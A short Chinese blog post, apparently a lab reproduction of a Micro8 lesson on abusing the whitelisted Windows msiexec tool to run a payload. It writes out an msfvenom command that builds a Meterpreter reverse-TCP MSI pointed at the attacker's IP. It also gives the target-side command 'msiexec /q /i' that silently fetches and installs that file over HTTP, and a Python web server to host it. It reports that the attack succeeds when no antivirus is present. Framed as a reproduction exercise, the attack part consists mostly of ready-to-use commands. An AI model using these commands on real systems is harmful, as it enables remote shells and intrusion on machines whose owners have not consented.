对亮神基于白名单 Msiexec 执行 Payload 第八季复现

0x00 Msiexec 简介

Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 2003,Windows 7等

0x01 环境

攻击机kali 192.168.5.99
靶机win7 192.168.5.112
装有国内常见AV

0x02复现

攻击机配置监听
在这里插入图片描述
靶机执行
在这里插入图片描述
有AV无法弹回。
无AV成功
在这里插入图片描述

0x03

payload生成

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.99 lport=10129 -f msi > shell.msi

靶机命令

msiexec /q /i http://192.168.5.99/shell.msi

用python启动80监听

python -m SimpleHTTPServer 80

在这里插入图片描述

0x04总结

不过AV,会被拦截。若无法弹回,可测试使用弹出一个cmd,详见借鉴链接2

0x05借鉴

https://github.com/Micropoor/Micro8/blob/master/第七十八课:基于白名单Msiexec执行payload第八季.pdf
https://www.cnblogs.com/backlion/p/10493910.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值